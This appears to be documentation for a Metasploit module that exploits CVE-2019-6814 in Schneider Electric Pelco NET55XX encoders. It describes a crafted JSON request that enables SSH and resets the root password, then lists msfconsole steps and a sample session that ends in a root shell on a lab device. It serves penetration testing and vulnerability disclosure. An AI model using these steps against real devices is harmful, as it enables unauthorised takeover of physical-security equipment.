Shelby Pace
1.8 KiB
Vulnerable Application
Schneider Electric Pelco NET55XX Encoder (CVE 2019-6814)
Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550).
This module exploits an inadequate access control vulnerability creating a malicious JSON request to the webUI encoder, thus allowing the SSH service to be enabled and changing the root password.
Verification Steps
- Start
msfconsole use exploit/linux/http/schneider_electric_net55xx_encoderset RHOSTS [rhosts]set RPORT [rport]set NEW_PASSWORD [new password]exploit- Verify you get a root shell
Options
This module can be as simple as setting the RHOST and NEW_PASSWORD option, and you're ready to go.
NEW_PASSWORD
You should set a new SSH password to the vulnerable device.
Scenarios
Schneider Electric Pelco Encoder NET5501-XT
msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RHOSTS 192.168.34.2 RHOSTS => 192.168.34.2 msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RPORT 80 RPORT => 80 msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set NEW_PASSWORD msfrapid7 NEW_PASSWORD => msfrapid7 msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > run
[] 192.168.34.2:22 - Attempt to start a SSH connection... [] 192.168.34.2:80 - Attempt to change the root password... [+] 192.168.34.2:80 - Successfully changed the root password... [+] 192.168.34.2:22 - Session established [] Found shell. [] Command shell session 1 opened (192.168.34.3:37033 -> 192.168.34.2:22) at 2019-07-03 10:57:07 -0400
uname -a;id Linux NET5501-XT-K61200103 2.6.37 #1 PREEMPT Fri Aug 8 04:33:08 KST 2014 armv7l unknown uid=0(root) gid=0(root) groups=0(root)